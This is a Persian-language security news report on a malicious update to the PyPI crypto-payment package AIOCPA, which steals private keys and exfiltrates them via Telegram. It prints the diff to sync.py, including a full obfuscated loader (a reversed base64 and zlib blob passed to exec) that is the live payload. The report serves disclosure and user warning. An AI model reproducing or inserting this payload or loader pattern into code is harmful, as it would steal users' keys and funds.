5
به روزرسانی اخیر پکیج پایتونی AIOCPA، حاوی کدهای مخربی است که برای سرقت کلیدهای خصوصی طراحی شده است. این کد زمانی که کاربران کتابخانه را راه اندازی میکنند، اطلاعات حساس را استخراج و از طریق تلگرام برای هکر ارسال میکند.
AIOCPA یک کتابخانه مرتبط با ارز دیجیتال است. این پکیج اولین بار در آگوست 2024 منتشر شد و از آن زمان انتظار میرفت که به روزرسانیهای منظمی را دریافت کند. این پکیج تا به امروز 12100 مرتبه بارگیری شده است.
نسخه ۰.۱.۱۳ پکیج AIOCPA که همان نسخه آلوده میباشد، ، بیستم نوامبر ۲۰۲۴ منتشر شده است. این پکیج شامل تغییراتی در اسکریپت پایتون “sync.py” میباشد.
---
+++
@@ -39,10 +39,11 @@
if not name.startswith("_") and inspect.iscoroutinefunction(
getattr(obj, name),
):
async_to_sync(obj, name)
+_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'==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'))
if sys.platform == "win32":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
for base in (*CryptoPay.__bases__, *CryptoPayObject.__subclasses__()):
جالب است که این پکیج در گیت هاب به منظور عدم شناسایی این بسته مخرب، آلوده نمیباشد. پکیج مورد نظر به عنوان یک کلاینت Crypto Pay API توصیف شده است. Crypto Pay به عنوان یک سیستم پرداخت بر اساس Crypto Bot (CryPTOBOT) تبلیغ میشود که به کاربران امکان میدهد پرداختهای Crypto را بپذیرند و سکهها را با استفاده از API به کاربران منتقل کنند.
پکیج AIOCPA به طور رسمی از مخزن PYPI حذف شده است. به کاربران توصیه میشود هنگام دانلود کتابخانههای مرتبط با ارز دیجیتال احتیاط نمایند تا قربانی این چنین حملاتی نشوند.
